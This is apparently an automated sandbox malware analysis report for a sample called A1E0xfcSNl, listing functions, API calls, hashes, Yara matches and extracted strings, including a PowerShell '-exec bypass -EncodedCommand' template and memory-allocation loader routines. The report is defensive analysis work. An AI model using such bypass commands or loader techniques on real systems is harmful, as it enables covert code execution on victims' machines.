                                            • Associated: 00000000.00000002.2975833411.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2975871835.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2975941933.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2975979762.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2976023864.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_A1E0xfcSNl.jbxd
                                            Similarity
                                            • API ID: Virtual$AllocCreateProtectThread
                                            • String ID:
                                            • API String ID: 3039780055-0
                                            • Opcode ID: 37a72bd22e1593272b4bf177035eaaf1f4bd0309aa4848ec5ea1f9fd2353670d
                                            • Instruction ID: 4860219b4c01c513d172ce07c02c5f666ef61a193e7305fd3c1758593cceafba
                                            • Opcode Fuzzy Hash: 37a72bd22e1593272b4bf177035eaaf1f4bd0309aa4848ec5ea1f9fd2353670d
                                            • Instruction Fuzzy Hash: 83012B9231558051E7249B73AC04B9AAA91A38DBC9F48C135FE4B5FB65DA3CC145C308
                                            Function 00401704 Relevance: 4.5, APIs: 3, Instructions: 45fileCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 429 401704-40175c CreateFileA 430 40179c-4017a5 429->430 431 40175e-401760 429->431 432 401781-40178f CloseHandle 431->432 433 401762-40177f ReadFile 431->433 432->430 433->432 434 401791-40179a 433->434 434->431
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2975793604.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2975749424.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2975833411.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2975871835.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2975941933.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2975979762.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2976023864.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_A1E0xfcSNl.jbxd
                                            Similarity
                                            • API ID: File$CloseCreateHandleRead
                                            • String ID:
                                            • API String ID: 1035965006-0
                                            • Opcode ID: d0ade87b55ea1173ce219873fd21c40e70a9c53e42d9cadcd6b17f6b1618b3d2
                                            • Instruction ID: 7b1d3a4e01a1f8e2f055cb9d21318694f184940eaf5a18d2a9f539c7fc6a8346
                                            • Opcode Fuzzy Hash: d0ade87b55ea1173ce219873fd21c40e70a9c53e42d9cadcd6b17f6b1618b3d2
                                            • Instruction Fuzzy Hash: 2401D46531461186E7214B52AC04716B6A0B3D4BE9F648339BFA907BD4DB7DC54ACB08
                                            Function 007BF118 Relevance: 3.0, APIs: 2, Instructions: 42networkCOMMONLIBRARYCODE
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 435 7bf118-7bf12a 436 7bf14e-7bf150 435->436 437 7bf12c-7bf136 call 7e25e0 435->437 439 7bf1c9-7bf1d1 436->439 440 7bf152-7bf159 436->440 441 7bf13c-7bf13e 437->441 440->439 442 7bf15b-7bf1c2 call 7cb434 * 2 call 7cb454 * 4 440->442 443 7bf1d2-7bf1e3 call 7e25d8 call 7d0414 441->443 444 7bf144 441->444 442->439 444->436
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CleanupStartup
                                            • String ID:
                                            • API String ID: 915672949-0
                                            • Opcode ID: d22241c7f1bd4084ee50ee5593018a46650914ab47a10bd4edb93220355cbedb
                                            • Instruction ID: f0195e954e0522f338b0534480a0260b47b8433e74e48b366ae4097bea6f68a3
                                            • Opcode Fuzzy Hash: d22241c7f1bd4084ee50ee5593018a46650914ab47a10bd4edb93220355cbedb
                                            • Instruction Fuzzy Hash: 33111B34A09BCAC6FB18AB60E89E7753295A744304F40043EA7590B3A7DF7D955AC710
                                            Function 007796B4 Relevance: 1.6, APIs: 1, Instructions: 149libraryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 461 7796b4-77971e 462 779723-77972c 461->462 463 779732-7797b6 call 778b64 LoadLibraryA 462->463 464 77994f-779963 462->464 467 7797bb-7797c4 463->467 468 77993c-77994a 467->468 469 7797ca-7797d0 467->469 468->462 470 7797d6-7797ee 469->470 471 7798a9-779910 call 778b64 469->471 470->471 473 7797f4-7798a7 470->473 475 779913-779927 471->475 473->475 476 779937 475->476 477 779929-779932 475->477 476->467 477->476
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                            • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID:
                                            • API String ID: 1029625771-0
                                            • Opcode ID: 74d038c8b1c51bf1d7765a817c366e135375bbd51fab872694d5e2c19deb3bea
                                            • Instruction ID: 80fc3bfd8db56dd963d6a11f248bb7b1478906e3db73c4bf58452df2344de59e
                                            • Opcode Fuzzy Hash: 74d038c8b1c51bf1d7765a817c366e135375bbd51fab872694d5e2c19deb3bea
                                            • Instruction Fuzzy Hash: 9C618736219B8486CAA0CB0AE49035AB7A0F7C9BD4F548525EFCE83B28DF3DD555CB00
                                            Function 00403040 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 479 403040-403051 call 401950 call 4017f8 484 403058-40305f SleepEx 479->484 484->484
                                            APIs
                                              • Part of subcall function 004017F8: malloc.MSVCRT ref: 004017B9
                                              • Part of subcall function 004017F8: SleepEx.KERNELBASE ref: 004017CD
                                              • Part of subcall function 004017F8: GetTickCount.KERNEL32 ref: 004017FC
                                              • Part of subcall function 004017F8: CreateThread.KERNEL32 ref: 00401885
                                            • SleepEx.KERNELBASE(?,?,?,004013B4), ref: 0040305D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2975793604.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2975749424.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2975833411.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2975871835.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2975941933.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2975979762.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2976023864.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_A1E0xfcSNl.jbxd
                                            Similarity
                                            • API ID: Sleep$CountCreateThreadTickmalloc
                                            • String ID:
                                            • API String ID: 345437100-0
                                            • Opcode ID: 425a1bfd6dc76289f59e140baf5a553519d4dbae3435d8d7a7e3de4f13007a03
                                            • Instruction ID: 6421346cc2233eacca5f16f640383cf641c739f700fbc6dff330eaabfecbeef7
                                            • Opcode Fuzzy Hash: 425a1bfd6dc76289f59e140baf5a553519d4dbae3435d8d7a7e3de4f13007a03
                                            • Instruction Fuzzy Hash: EEC02B5430104440DB0833F3442733D06180B08388F0C043FFE0B322D28C3CC050030E
                                            Function 00779324 Relevance: 1.3, APIs: 1, Instructions: 87memoryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 485 779324-779358 486 77935e-779374 485->486 487 77944d-779453 485->487 486->487 491 77937a-7793c2 486->491 488 779455-779474 VirtualAlloc 487->488 489 779479-779482 487->489 488->489 493 7793ce-7793d4 491->493 494 7793d6-7793de 493->494 495 779402-779408 493->495 494->495 496 7793e0-7793e6 494->496 495->487 497 77940a-779445 495->497 496->495 498 7793e8-779400 496->498 497->487 498->493
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                            • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            • Opcode ID: 614a4b05fd2fcf958961d58200ae62ff8fa006310eb0dba3dbba10185b0029ad
                                            • Instruction ID: 4791e37a8243ef4ad6fa33bdd1df1e05d1a204ebf9b3b6baf2f6c50dafcfa5d0
                                            • Opcode Fuzzy Hash: 614a4b05fd2fcf958961d58200ae62ff8fa006310eb0dba3dbba10185b0029ad
                                            • Instruction Fuzzy Hash: 51419872629B8487DB60CB1AE48471AB7A1F7C8B94F105225FBDE87B68DB3CD4518F00

                                            Non-executed Functions

                                            Function 007D6514 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 460COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: __doserrno_errno_invalid_parameter_noinfo
                                            • String ID: U
                                            • API String ID: 3902385426-4171548499
                                            • Opcode ID: a469b43449293490d86ed3caa32e41753b17625943497404ea198177ea08bf0b
                                            • Instruction ID: 26966987b1598435038897b711ad23b88366276bf7d36189688b7ba22b31564d
                                            • Opcode Fuzzy Hash: a469b43449293490d86ed3caa32e41753b17625943497404ea198177ea08bf0b
                                            • Instruction Fuzzy Hash: 34021572718A8186DB20CF29D48436EB775F784B48F544117EB8A83B69EF3DD885CB10
                                            Function 007C867C Relevance: 46.6, APIs: 22, Strings: 4, Instructions: 1078processCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • GetCurrentProcess.KERNEL32 ref: 007C8FA0
                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 007C8FD9
                                            • Process32First.KERNEL32 ref: 007C8FFB
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateCurrentFirstProcessProcess32SnapshotToolhelp32
                                            • String ID: %s%d%d%s%s%d$%s%d%d$x64$x86
                                            • API String ID: 718051232-1833344708
                                            • Opcode ID: 44ee8957408f2f3c2d0d1c1155748847862033341b6ca19cb8ca6a6e19bffbea
                                            • Instruction ID: 8c3fd52bde66b895fd8ca30966c70a0a7edf25c1db970a2b079e337e919dba9d
                                            • Opcode Fuzzy Hash: 44ee8957408f2f3c2d0d1c1155748847862033341b6ca19cb8ca6a6e19bffbea
                                            • Instruction Fuzzy Hash: 8672E921F05641C2DAB8DB269855F7523D1B789BC0FA4412EDE0E87B59EF3CCA86C742
                                            Function 007D2F9C Relevance: 37.4, APIs: 19, Strings: 2, Instructions: 694COMMON
                                            Download Yara Rule
                                            APIs
                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 007D2FFD
                                              • Part of subcall function 007D1600: _getptd.LIBCMT ref: 007D1616
                                              • Part of subcall function 007D1600: __updatetlocinfo.LIBCMT ref: 007D164B
                                              • Part of subcall function 007D1600: __updatetmbcinfo.LIBCMT ref: 007D1672
                                            • _errno.LIBCMT ref: 007D3002
                                              • Part of subcall function 007D1D18: _getptd_noexit.LIBCMT ref: 007D1D1C
                                            • _fileno.LIBCMT ref: 007D302F
                                              • Part of subcall function 007D5A54: _errno.LIBCMT ref: 007D5A5D
                                              • Part of subcall function 007D5A54: _invalid_parameter_noinfo.LIBCMT ref: 007D5A68
                                            • write_multi_char.LIBCMT ref: 007D366B
                                            • write_string.LIBCMT ref: 007D3688
                                            • write_multi_char.LIBCMT ref: 007D36A5
                                            • write_string.LIBCMT ref: 007D3704
                                            • write_string.LIBCMT ref: 007D373B
                                            • write_multi_char.LIBCMT ref: 007D375D
                                            • free.LIBCMT ref: 007D3771
                                            • _isleadbyte_l.LIBCMT ref: 007D3842
                                            • write_char.LIBCMT ref: 007D3858
                                            • write_char.LIBCMT ref: 007D3879
                                            • _errno.LIBCMT ref: 007D397C
                                            • _invalid_parameter_noinfo.LIBCMT ref: 007D3987
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _errnowrite_multi_charwrite_string$Locale_invalid_parameter_noinfowrite_char$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
                                            • String ID: $@
                                            • API String ID: 3318157856-1077428164
                                            • Opcode ID: 43138757bcee35b18d1a9352f63dda4217664694579bf9df27f2658c9d71e8f1
                                            • Instruction ID: ce72dc874b0c585469fe89773937ba08d5a40a6539e3c78d940b43a4dea52ae6
                                            • Opcode Fuzzy Hash: 43138757bcee35b18d1a9352f63dda4217664694579bf9df27f2658c9d71e8f1
                                            • Instruction Fuzzy Hash: 214223B2608A8486EB25CB29D54437E7BB0F7417A4F281117DE4A57BA8DB7CDB41CB03
                                            Function 007D2528 Relevance: 35.7, APIs: 19, Strings: 1, Instructions: 687COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 007D2589
                                              • Part of subcall function 007D1600: _getptd.LIBCMT ref: 007D1616
                                              • Part of subcall function 007D1600: __updatetlocinfo.LIBCMT ref: 007D164B
                                              • Part of subcall function 007D1600: __updatetmbcinfo.LIBCMT ref: 007D1672
                                            • _errno.LIBCMT ref: 007D258E
                                              • Part of subcall function 007D1D18: _getptd_noexit.LIBCMT ref: 007D1D1C
                                            • _fileno.LIBCMT ref: 007D25BB
                                              • Part of subcall function 007D5A54: _errno.LIBCMT ref: 007D5A5D
                                              • Part of subcall function 007D5A54: _invalid_parameter_noinfo.LIBCMT ref: 007D5A68
                                            • write_multi_char.LIBCMT ref: 007D2BEB
                                            • write_string.LIBCMT ref: 007D2C08
                                            • write_multi_char.LIBCMT ref: 007D2C25
                                            • write_string.LIBCMT ref: 007D2C84
                                            • write_string.LIBCMT ref: 007D2CBB
                                            • write_multi_char.LIBCMT ref: 007D2CDD
                                            • free.LIBCMT ref: 007D2CF1
                                            • _isleadbyte_l.LIBCMT ref: 007D2DC2
                                            • write_char.LIBCMT ref: 007D2DD8
                                            • write_char.LIBCMT ref: 007D2DF9
                                            • _errno.LIBCMT ref: 007D2EF3
                                            • _invalid_parameter_noinfo.LIBCMT ref: 007D2EFE
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _errnowrite_multi_charwrite_string$Locale_invalid_parameter_noinfowrite_char$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
                                            • String ID:
                                            • API String ID: 3318157856-3916222277
                                            • Opcode ID: fca6f3964dd5be39caa2a1998c64648d50546d36c07ae532eb44751125f6f7d4
                                            • Instruction ID: 430cc0cf774ffb0b1caf2c72e0ee0063605642ec5619201b04493a0b1bc2aa6e
                                            • Opcode Fuzzy Hash: fca6f3964dd5be39caa2a1998c64648d50546d36c07ae532eb44751125f6f7d4
                                            • Instruction Fuzzy Hash: C832227270868486EB258F24D55437E7BB1F7A5794F281007DE4A17BAAEB7CC943CB40
                                            Function 0078239C Relevance: 32.2, APIs: 16, Strings: 2, Instructions: 694COMMON
                                            Download Yara Rule
                                            APIs
                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 007823FD
                                              • Part of subcall function 00780A00: _getptd.LIBCMT ref: 00780A16
                                              • Part of subcall function 00780A00: __updatetlocinfo.LIBCMT ref: 00780A4B
                                              • Part of subcall function 00780A00: __updatetmbcinfo.LIBCMT ref: 00780A72
                                            • _errno.LIBCMT ref: 00782402
                                              • Part of subcall function 00781118: _getptd_noexit.LIBCMT ref: 0078111C
                                            • _fileno.LIBCMT ref: 0078242F
                                              • Part of subcall function 00784E54: _errno.LIBCMT ref: 00784E5D
                                              • Part of subcall function 00784E54: _invalid_parameter_noinfo.LIBCMT ref: 00784E68
                                            • write_multi_char.LIBCMT ref: 00782A6B
                                            • write_string.LIBCMT ref: 00782A88
                                            • write_multi_char.LIBCMT ref: 00782AA5
                                            • write_string.LIBCMT ref: 00782B04
                                            • write_string.LIBCMT ref: 00782B3B
                                            • write_multi_char.LIBCMT ref: 00782B5D
                                            • free.LIBCMT ref: 00782B71
                                            • _isleadbyte_l.LIBCMT ref: 00782C42
                                            • write_char.LIBCMT ref: 00782C58
                                            • write_char.LIBCMT ref: 00782C79
                                            • _errno.LIBCMT ref: 00782D7C
                                            • _invalid_parameter_noinfo.LIBCMT ref: 00782D87
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                            • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _errnowrite_multi_charwrite_string$Locale_invalid_parameter_noinfowrite_char$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
                                            • String ID: $@
                                            • API String ID: 3318157856-1077428164
                                            • Opcode ID: 0917c7b026fa98026fd61c82a9db6b94b013ed73c29c4ccbf17a38093d3ada48
                                            • Instruction ID: 44e9f83507fa3e2cc868ae7766487011f28dde848e5975ca25f3a7d8ac94692d
                                            • Opcode Fuzzy Hash: 0917c7b026fa98026fd61c82a9db6b94b013ed73c29c4ccbf17a38093d3ada48
                                            • Instruction Fuzzy Hash: 3842357278868486EB29EF15D54437E7FA0FB45B96F244005DF4A57AA6EB3CC843CB01
                                            Function 00781928 Relevance: 28.6, APIs: 14, Strings: 2, Instructions: 645COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00781989
                                              • Part of subcall function 00780A00: _getptd.LIBCMT ref: 00780A16
                                              • Part of subcall function 00780A00: __updatetlocinfo.LIBCMT ref: 00780A4B
                                              • Part of subcall function 00780A00: __updatetmbcinfo.LIBCMT ref: 00780A72
                                            • _errno.LIBCMT ref: 0078198E
                                              • Part of subcall function 00781118: _getptd_noexit.LIBCMT ref: 0078111C
                                            • _fileno.LIBCMT ref: 007819BB
                                              • Part of subcall function 00784E54: _errno.LIBCMT ref: 00784E5D
                                              • Part of subcall function 00784E54: _invalid_parameter_noinfo.LIBCMT ref: 00784E68
                                            • write_multi_char.LIBCMT ref: 00781FEB
                                            • write_string.LIBCMT ref: 00782008
                                            • _errno.LIBCMT ref: 007822F3
                                            • _invalid_parameter_noinfo.LIBCMT ref: 007822FE
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                            • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _errno$Locale_invalid_parameter_noinfo$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexitwrite_multi_charwrite_string
                                            • String ID: -$0
                                            • API String ID: 3246410048-417717675
                                            • Opcode ID: 9d83564e1f44511746efc6243833ea10ca1e0c0cc6e5e094e442fc0115aecad6
                                            • Instruction ID: 8f672f9bbfb781a1cd66913dfe7527e7965a2b35094aa7369b4e637737586de2
                                            • Opcode Fuzzy Hash: 9d83564e1f44511746efc6243833ea10ca1e0c0cc6e5e094e442fc0115aecad6
                                            • Instruction Fuzzy Hash: A3325872B8868886EB29EF15D5483BE7B78F745795FA41005DF4A47A69DB3CC843CB00
                                            Function 00785914 Relevance: 26.7, APIs: 14, Strings: 1, Instructions: 460COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                            • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: __doserrno_errno_invalid_parameter_noinfo
                                            • String ID: U
                                            • API String ID: 3902385426-4171548499
                                            • Opcode ID: 1e306023ed328bab19b7a5d60cdebdd92491a2c212ad1309fcb9b443deab4914
                                            • Instruction ID: d8798a136d36adb3e77a1be63bae5059b1fbb60284200ef8a6c44b8a56272216
                                            • Opcode Fuzzy Hash: 1e306023ed328bab19b7a5d60cdebdd92491a2c212ad1309fcb9b443deab4914
                                            • Instruction Fuzzy Hash: C8024372714B82C6DB20AF29E48836EB7A1F785798F900116EB8E87B54DB3DD945CB10
                                            Function 007C7B38 Relevance: 26.0, APIs: 10, Strings: 7, Instructions: 545COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • _snprintf.LIBCMT ref: 007C7D66
                                            • _snprintf.LIBCMT ref: 007C7D83
                                            • _snprintf.LIBCMT ref: 007C7CA5
                                              • Part of subcall function 007CF63C: _errno.LIBCMT ref: 007CF673
                                              • Part of subcall function 007CF63C: _invalid_parameter_noinfo.LIBCMT ref: 007CF67E
                                            • _snprintf.LIBCMT ref: 007C7FD8
                                            • _snprintf.LIBCMT ref: 007C8334
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _snprintf$_errno_invalid_parameter_noinfo
                                            • String ID: %s%s$%s%s$%s%s: %s$%s&%s$%s&%s=%s$?%s$?%s=%s
                                            • API String ID: 3442832105-1222817042
                                            • Opcode ID: 412d66828e9d0a494a073441381b0bd2cf94e887e51df8164056f8f6c456b4ac
                                            • Instruction ID: 69b193161675a090336093c9a464cbae0bead88c368732074f3f4d9008f0a286
                                            • Opcode Fuzzy Hash: 412d66828e9d0a494a073441381b0bd2cf94e887e51df8164056f8f6c456b4ac
                                            • Instruction Fuzzy Hash: 7332B5A2618EC5D2DB258F29E0457E9A3B0FF98799F045109DF8917B21EF3CD2A6C740
                                            Function 007C1C30 Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 150filetimeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • malloc.LIBCMT ref: 007C1C63
                                              • Part of subcall function 007CF284: _FF_MSGBANNER.LIBCMT ref: 007CF2B4
                                              • Part of subcall function 007CF284: _NMSG_WRITE.LIBCMT ref: 007CF2BE
                                              • Part of subcall function 007CF284: HeapAlloc.KERNEL32 ref: 007CF2D9
                                              • Part of subcall function 007CF284: _callnewh.LIBCMT ref: 007CF2F2
                                              • Part of subcall function 007CF284: _errno.LIBCMT ref: 007CF2FD
                                              • Part of subcall function 007CF284: _errno.LIBCMT ref: 007CF308
                                              • Part of subcall function 007BD044: malloc.LIBCMT ref: 007BD057
                                              • Part of subcall function 007BD074: htonl.WS2_32 ref: 007BD07F
                                            • GetCurrentDirectoryA.KERNEL32 ref: 007C1CDB
                                            • FindFirstFileA.KERNEL32 ref: 007C1D14
                                            • GetLastError.KERNEL32 ref: 007C1D23
                                            • free.LIBCMT ref: 007C1D5E
                                            • free.LIBCMT ref: 007C1D6B
                                              • Part of subcall function 007CF244: HeapFree.KERNEL32 ref: 007CF25A
                                              • Part of subcall function 007CF244: _errno.LIBCMT ref: 007CF264
                                              • Part of subcall function 007CF244: GetLastError.KERNEL32 ref: 007CF26C
                                            • FileTimeToSystemTime.KERNEL32 ref: 007C1D78
                                            • SystemTimeToTzSpecificLocalTime.KERNEL32 ref: 007C1D89
                                            • FindNextFileA.KERNEL32 ref: 007C1E46
                                            • FindClose.KERNEL32 ref: 007C1E57
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Time$FileFind_errno$ErrorHeapLastSystemfreemalloc$AllocCloseCurrentDirectoryFirstFreeLocalNextSpecific_callnewhhtonl
                                            • String ID: %s$.\*$D0%02d/%02d/%02d %02d:%02d:%02d%s$F%I64d%02d/%02d/%02d %02d:%02d:%02d%s
                                            • API String ID: 723279517-1754256099
                                            • Opcode ID: 457427d9072a94c5804b99a9cf994faefb62e403f1d248ccd724e43b7fc9f85d
                                            • Instruction ID: 261be703918bc21e2ab2f6076cd29ddb55acbde52726f13b23e6b568a1ad9430
                                            • Opcode Fuzzy Hash: 457427d9072a94c5804b99a9cf994faefb62e403f1d248ccd724e43b7fc9f85d
                                            • Instruction Fuzzy Hash: 8151B172708795C6DB14DF66E44479EA7A2F789B80F40402AEE4E47B59EF7CC60ACB40
                                            Function 00776F38 Relevance: 18.5, APIs: 10, Strings: 2, Instructions: 545COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • _snprintf.LIBCMT ref: 00777166
                                            • _snprintf.LIBCMT ref: 00777183
                                            • _snprintf.LIBCMT ref: 007770A5
                                              • Part of subcall function 0077EA3C: _errno.LIBCMT ref: 0077EA73
                                              • Part of subcall function 0077EA3C: _invalid_parameter_noinfo.LIBCMT ref: 0077EA7E
                                            • _snprintf.LIBCMT ref: 007773D8
                                            • _snprintf.LIBCMT ref: 00777734
                                            Strings
                                            • not create token: %d, xrefs: 00777657
                                            • nop -exec bypass -EncodedCommand "%s", xrefs: 007774D7
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                            • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _snprintf$_errno_invalid_parameter_noinfo
                                            • String ID: nop -exec bypass -EncodedCommand "%s"$not create token: %d
                                            • API String ID: 3442832105-3652497171
                                            • Opcode ID: 5c5fb6f4a09e06ccff5c46792293312cb34477fc99d63142bfc01bcec4b0117e
                                            • Instruction ID: cc693dea2e2150d3e35d31cf02a548232563590bbb5e24a57fd4298d0a31bf12
                                            • Opcode Fuzzy Hash: 5c5fb6f4a09e06ccff5c46792293312cb34477fc99d63142bfc01bcec4b0117e
                                            • Instruction Fuzzy Hash: 6C32A562618E8592DF268B2DE0052E9A3B0FF997D9F449501DF8D17B25EF3CD2A6C340
                                            Function 007C0F34 Relevance: 18.2, APIs: 12, Instructions: 163processCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateProcessAsUserA.ADVAPI32 ref: 007C0F8F
                                            • GetLastError.KERNEL32 ref: 007C0F9D
                                            • GetLastError.KERNEL32 ref: 007C0FC1
                                              • Part of subcall function 007BFE54: MultiByteToWideChar.KERNEL32 ref: 007BFE81
                                              • Part of subcall function 007BFE54: MultiByteToWideChar.KERNEL32 ref: 007BFEA9
